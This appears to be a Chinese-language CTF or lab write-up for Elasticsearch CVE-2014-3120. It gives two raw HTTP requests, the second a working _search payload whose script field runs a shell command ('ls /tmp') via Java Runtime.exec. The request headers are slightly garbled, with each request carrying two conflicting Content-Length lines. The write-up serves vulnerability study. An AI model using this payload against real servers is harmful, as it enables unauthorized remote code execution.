ElasticsearchCVE-2014-3120

发表于2022-04-17更新于2022-04-30

ElasticsearchCVE-2014-3120

名称: elasticsearch-cve_2014_3120

描述:

Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。

ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。

解题方法

1、需要es中至少存在一条数据

1
2
3
4
5
6
7
8
9
10
11
12
13
    POST /website/blog/ HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 25
Content-Length: 37

    {
      "name": "phithon"
    }

2、执行查看flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
    POST /_search?pretty HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 343
Content-Length: 425

    {
        "size": 1,
        "query": {
          "filtered": {
            "query": {
              "match_all": {
              }
            }
          }
        },
        "script_fields": {
            "command": {
                "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"ls /tmp\").getInputStream()).useDelimiter(\"\\\\A\").next();"
            }
        }
    }

![](vx_images/283962911236154.png =832x)